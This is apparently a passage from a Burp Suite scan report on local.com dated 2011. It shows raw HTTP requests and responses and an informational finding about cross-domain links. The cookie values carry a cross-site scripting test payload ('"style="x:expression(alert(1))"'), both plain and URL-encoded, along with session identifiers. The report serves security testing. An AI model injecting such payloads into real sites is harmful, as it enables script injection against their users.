Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.20. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=59637991